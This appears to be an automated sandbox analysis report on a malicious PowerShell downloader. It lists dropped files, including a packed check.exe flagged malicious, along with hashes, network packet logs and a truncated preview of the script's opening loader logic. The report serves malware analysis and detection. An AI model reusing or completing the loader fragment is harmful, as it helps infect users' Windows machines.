SHA-512:	C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\libcrypto-3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5232408
Entropy (8bit):	5.940072183736028
Encrypted:	false
SSDEEP:	98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
MD5:	123AD0908C76CCBA4789C084F7A6B8D0
SHA1:	86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
SHA-256:	4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
SHA-512:	80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.\|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...\|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\libffi-8.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39696
Entropy (8bit):	6.641880464695502
Encrypted:	false
SSDEEP:	768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
MD5:	0F8E4992CA92BAAF54CC0B43AACCCE21
SHA1:	C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
SHA-256:	EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
SHA-512:	6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\libssl-3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	792856
Entropy (8bit):	5.57949182561317
Encrypted:	false
SSDEEP:	12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
MD5:	4FF168AAA6A1D68E7957175C8513F3A2
SHA1:	782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
SHA-256:	2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
SHA-512:	C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...\|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\psutil\_psutil_windows.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67072
Entropy (8bit):	5.909456553599775
Encrypted:	false
SSDEEP:	1536:j3sHmR02IvVxv7WCyKm7c5Th4JBHTOvyyaZE:jnIvryCyKx5Th4J5OvyyO
MD5:	49AC12A1F10AB93FAFAB064FD0523A63
SHA1:	3AD6923AB0FB5D3DD9D22ED077DB15B42C2FBD4F
SHA-256:	BA033B79E858DBFCBA6BF8FB5AFE10DEFD1CB03957DBBC68E8E62E4DE6DF492D
SHA-512:	1BC0F50E0BB0A9D9DDDAD31390E5C73B0D11C2B0A8C5462065D477E93FF21F7EDC7AA2B2B36E478BE0A797A38F43E3FBEB6AAABEF0BADEC1D8D16EB73DF67255
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......nT..5..5..5..#M2. 5..x@..(5..x@..&5..x@.."5..x@...5...k..(5..aM..;5..5...5...@..:5...@..+5...@^.+5...@..+5..Rich*5..................PE..d...._.g.........." .........h......\........................................@............`.........................................0...`.......@.... .......................0..(.......................................8............................................text...h........................... ..`.rdata..\I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\python3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70416
Entropy (8bit):	6.1258200129869405
Encrypted:	false
SSDEEP:	768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
MD5:	16855EBEF31C5B1EBE767F1C617645B3
SHA1:	315521F3A748ABFA35CD4D48E8DD09D0556D989B
SHA-256:	A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
SHA-512:	C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\python313.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6083856
Entropy (8bit):	6.126922729922386
Encrypted:	false
SSDEEP:	49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
MD5:	B9DE917B925DD246B709BB4233777EFD
SHA1:	775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
SHA-256:	0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
SHA-512:	F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\select.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30992
Entropy (8bit):	6.554484610649281
Encrypted:	false
SSDEEP:	384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
MD5:	20831703486869B470006941B4D996F2
SHA1:	28851DFD43706542CD3EF1B88B5E2749562DFEE0
SHA-256:	78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
SHA-512:	4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	709904
Entropy (8bit):	5.861739047785334
Encrypted:	false
SSDEEP:	12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
MD5:	0902D299A2A487A7B0C2D75862B13640
SHA1:	04BCBD5A11861A03A0D323A8050A677C3A88BE13
SHA-256:	2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
SHA-512:	8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4oaljy4l.zbb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4ar3q5x.vrp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2icuvgs.j0w.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y441f2pw.dgm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38755410
Entropy (8bit):	7.995839341470473
Encrypted:	true
SSDEEP:	786432:O+gX4BMdhwzTQXR5FbPp6FcSS5U/LT2KzVyPVLBdebXMb8VH/zEa:MXGMK4XR3bLSCU/+6yPl3ebcBa
MD5:	F17797CAAB0F1CB8D5813853AAD786CA
SHA1:	5B67F3D290B2E027EA617F239310BAE47083EE54
SHA-256:	C24D6A9DE8F394854E91A84ECE64E9A5A8FCC8B66E7E67AC47473E5CF709CFDE
SHA-512:	55D1F0217028564189545E9F7ECF8E0B087BABA792F97A3ADD825841C16A1B52368042EF08A1860E726749B4706456EC52236245C3CD8B15545630D8881D80A6
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..\.Z\.Z\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z\.Z.\.Zb..[3\.Zb..[+\.ZRich\.Z........PE..d...g.Vg.........."....).....\.................@....................................J.O...`.................................................\...x....p.......@..P"...........p..d...................................@...@............................................text............................... ..`.rdata..P.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d....p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7321706703370574
Encrypted:	false
SSDEEP:	96:Ywg3CqT2AkvhkvCCtjM026A8Hpx026l08Hpa:Ywo5jM0nx0da
MD5:	1649C454BD6A81DBB4C419C82A7EFEA9
SHA1:	81896946E2CADE9EBA94E9188F8C1D4961FB8BA9
SHA-256:	7EE5CE25094D9EB144233DAA61E0071931BDAAE6FBC067E19088151A98C08C5E
SHA-512:	4D3FBBC4B7C44D48C32FA9B132CDC387C0FD891BA3F77F9AF2039BAE8E85B7971DE489EDD810F6B6BD6BBB2CCFBCD2E88D5013D70F6B7AA117C1EFA3E7242E13
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. ...J.S...a.F..K..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...b.9..K.../U..K......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y=............................^.A.p.p.D.a.t.a...B.V.1......Y;...Roaming.@......EW<2.Y;...../.....................J...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y8.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y8.....2.........................W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y8.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y8.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y@.....u...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UN2DQSAVXZN9F7YQHBGL.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7321706703370574
Encrypted:	false
SSDEEP:	96:Ywg3CqT2AkvhkvCCtjM026A8Hpx026l08Hpa:Ywo5jM0nx0da
MD5:	1649C454BD6A81DBB4C419C82A7EFEA9
SHA1:	81896946E2CADE9EBA94E9188F8C1D4961FB8BA9
SHA-256:	7EE5CE25094D9EB144233DAA61E0071931BDAAE6FBC067E19088151A98C08C5E
SHA-512:	4D3FBBC4B7C44D48C32FA9B132CDC387C0FD891BA3F77F9AF2039BAE8E85B7971DE489EDD810F6B6BD6BBB2CCFBCD2E88D5013D70F6B7AA117C1EFA3E7242E13
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. ...J.S...a.F..K..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...b.9..K.../U..K......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y=............................^.A.p.p.D.a.t.a...B.V.1......Y;...Roaming.@......EW<2.Y;...../.....................J...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y8.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y8.....2.........................W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y8.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y8.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y@.....u...........

C:\Users\user\AppData\Roaming\ntmNrnMq.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	38486075
Entropy (8bit):	7.99826293637919
Encrypted:	true
SSDEEP:	786432:P6ivV/JVTmIg5sc8TcKuWLN4xu5GFsxHF8lhP7TK5yt86iJ/P47:rvBfKIrc8Tcfrx2GFgF8lhDT4yez47
MD5:	F2F92A3F90A6E89AEB583345BB035AB4
SHA1:	30D80B1DAF75C1B247D1E39B8D944CC08B714CF4
SHA-256:	2BAB4B50372C80C4E80C3D23D9A3B549B4DD5EEE98845C86E9BB60568C1A57F6
SHA-512:	6205170550E3D6AE6C80F8685A27A7ED8A2080971602EC06580C158AF7971F77D3F352A5E350FB2E80E45F4DE8BABADA7C8941581174D701258C2C0C16E6AF01
Malicious:	false
Reputation:	unknown
Preview:	PK........S2.Y....?K.R\O.....check.exe.]{`.W...TZ...... ..e...hw.......hh.j...V....c.`...]}IhU...,mQ-.."(Z...s...D..........;.{...d..os.l.:....l%6....._5..o....w.,..w..?........=a.#...=.p...{B.8.....}...yt...bc.I.e..}....:..72.r.M.....?/d..m.sH[~^.n....i....`\8.%...y....\.N...d<.>.3....g...F..6......I[+[=G......m(..o...'N..n...t....-?.3...>..m....A...b=j."....).2..../.[.[V....(...f....?..w.....V9lK..>.C..).zY.`.8..n.mD...F.F"...Y..=..9j..w......s....s..6...x]^+I.....Jy.&N..;..x..R......c..pT].+[4)q..N...j.).cI...F+j.]N[Q.V......A)R....^....n....J(jA.:.2.hhb.R.Ht..............!.._=.rV....;l...j......O.r...W.(..y......Pl[.....l.-ak>u`..)..s!.i..]..)..>.Z..a.e.z7.n..X..C..:&...F.c.....'.H...c.h........3...;.x...]...B.......W.$!J......OJ..@z.U.W..-7..@.7m..^.T..J....D.P.}...).....T.?1..\|8o.Z..S..+*.....e...Y...R.....,...C........u.6.@E..8.nV.@.....w.o.o.o.}e.u..9u...)..(..<UA..?..?1..........SJ3.....b.R.....+.. z..r.....$%.Ot..j..)-.`5R

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468637495573347
Encrypted:	false
SSDEEP:	6144:SzZfpi6ceLPx9skLmb0fxZWSP3aJG8nAgeiJRMMhA2zX4WABluuNTjDH5S:0ZHtxZWOKnMM6bFp9j4
MD5:	70EE0225CA15B8CFD89D9FA148C7B46A
SHA1:	88995D21F1CF966B605A376593EA8383DF9762A2
SHA-256:	B7EEDD70C91578A38969DB2C53E23F244B0CFCD0AE46031B03A8AE26574F898E
SHA-512:	D3EEF0E2E3688B4333560AD4E6C6CB1EFA5B34C33B06116AB02A7E04AFC17D8A552247C6B268FA4E7E5D931D282DDEE26026669E86A57C7B36183C18004A55AF
Malicious:	false
Reputation:	unknown
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..D..K................................................................................................................................................................................................................................................................................................................................................R:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (64314), with CRLF line terminators
Entropy (8bit):	5.999156478146647
TrID:
File name:	download.ps1
File size:	51'318'168 bytes
MD5:	a766c6fe1358b7d441ff94575d3d4eb1
SHA1:	15d42c28ec43a8470f1027b0dbebe976c623e09a
SHA256:	ec7dc800753751c1de3d99e575ea591fe54210fddb48f1bfca88679fbc358c17
SHA512:	7c427388a4627687509fed5f3b5661765094a3da91c04f02cb9a28443f5ade05bfb53b23a9116779aad68bdee49611ad213d4d90cd3de1fb8b0a47a814e6932b
SSDEEP:	49152:Ylh6KeiZ9CruD6ch8wsawJRg2bN3oRIeEwd5RifHsfSn6DTIakmcWMlcsTk0bGaY:S
TLSH:	B7B73320AEAA6DBE0A6CC33D707F5F1D1BB00FD1844DE1DA47A0B9C7165FB41562B829
File Content Preview:	$ErrorActionPreference="Stop"; Set-Location $Env:AppData; $eqkOQfyq="$Env:AppData\DzIcXtPK"; if(Test-Path $eqkOQfyq) { if(Test-Path "$Env:AppData\fJRGfigg.txt") { Remove-Item "$Env:AppData\fJRGfigg.txt" }; Exit }; $domain=(Get-WmiObject Win32_ComputerSyst

File Icon


Icon Hash:	3270d6baae77db44

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 17:10:36.376710892 CET	49771	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:36.376759052 CET	443	49771	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:36.376919031 CET	49771	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:36.377877951 CET	49771	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:36.377897978 CET	443	49771	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:37.627120018 CET	443	49771	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:37.627845049 CET	49771	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:37.627871037 CET	443	49771	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:37.628912926 CET	443	49771	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:37.629004002 CET	49771	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:37.630495071 CET	49771	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:37.630495071 CET	49771	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:50.361534119 CET	49803	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:50.361577034 CET	443	49803	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:50.362750053 CET	49803	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:50.362751007 CET	49803	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:50.362787962 CET	443	49803	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:51.584980011 CET	443	49803	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:51.585644960 CET	49803	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:51.585673094 CET	443	49803	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:51.586925030 CET	443	49803	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:51.586997032 CET	49803	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:51.588915110 CET	49803	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:51.589056969 CET	443	49803	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:51.589086056 CET	49803	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:51.589099884 CET	49803	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:59.023230076 CET	49819	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:59.023271084 CET	443	49819	104.20.22.46	192.168.2.6
Dec 10, 2024 17:10:59.023473978 CET	49819	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:59.025068045 CET	49819	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:10:59.025082111 CET	443	49819	104.20.22.46	192.168.2.6
Dec 10, 2024 17:11:00.269659042 CET	443	49819	104.20.22.46	192.168.2.6
Dec 10, 2024 17:11:00.270649910 CET	49819	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:11:00.270662069 CET	443	49819	104.20.22.46	192.168.2.6
Dec 10, 2024 17:11:00.271965981 CET	443	49819	104.20.22.46	192.168.2.6
Dec 10, 2024 17:11:00.272064924 CET	49819	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:11:00.273688078 CET	49819	443	192.168.2.6	104.20.22.46
Dec 10, 2024 17:11:00.273688078 CET	49819	443	192.168.2.6	104.20.22.46

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 17:10:36.218789101 CET	52124	53	192.168.2.6	1.1.1.1
Dec 10, 2024 17:10:36.357424974 CET	53	52124	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
